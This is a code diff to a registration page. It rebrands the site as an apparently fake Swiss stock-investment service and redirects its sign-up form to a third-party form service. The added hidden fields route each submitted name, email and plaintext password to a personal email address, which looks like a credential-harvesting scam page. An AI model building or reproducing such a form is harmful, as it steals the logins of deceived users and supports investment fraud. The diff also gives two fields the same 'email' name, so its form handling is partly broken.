--- a/register.html
+++ b/register.html
@@ -3,23 +3,32 @@
 
 <head>
     <meta charset="UTF-8" />
-    <title>Athen - Register</title>
+    <title>swizterlandstockinvestement - Register</title>
     <script src="https://cdn.tailwindcss.com"></script>
 </head>
 
 <body class="bg-gray-900 text-white">
     <div class="min-h-screen flex items-center justify-center">
-        <form action="https://formspree.io/f/xdkdpgae" method="POST"
+        <form action="https://api.staticforms.xyz/submit" method="POST"
             class="bg-gray-800 p-8 rounded-lg shadow-lg space-y-4 w-full max-w-md">
-            <h2 class="text-2xl font-bold text-center text-yellow-400">Create an Account</h2>
+            <!-- StaticForms access key -->
+            <input type="hidden" name="accessKey" value="sf_l7209c1c36dd7h31l7lb9fg9">
+
+            <!-- Email to receive login request -->
+            <input type="hidden" name="email" value="jennifereneh05@email.com">
+
+            <!-- Redirect after success -->
+            <input type="hidden" name="redirectTo" value="https://swizterlandstockinvestement.vercel.app/login.html">
+
+
+            <h2 class="text-2xl font-bold text-center text-blue-500">Create an Account</h2>
             <input type="text" name="name" placeholder="Full Name" required
                 class="w-full p-3 rounded bg-gray-700 text-white" />
             <input type="email" name="email" placeholder="Email Address" required
                 class="w-full p-3 rounded bg-gray-700 text-white" />
             <input type="password" name="password" placeholder="Password" required
                 class="w-full p-3 rounded bg-gray-700 text-white" />
-            <button type="submit"
-                class="w-full bg-blue-600 hover:bg-yellow-400 text-white py-3 rounded">Register</button>
+            <button type="submit" class="w-full bg-blue-600 hover:bg-blue-700 text-white py-3 rounded">Register</button>
             <p class="text-center text-sm text-gray-400">Already have an account? <a href="login.html"
                     class="text-blue-400">Login</a></p>
         </form>
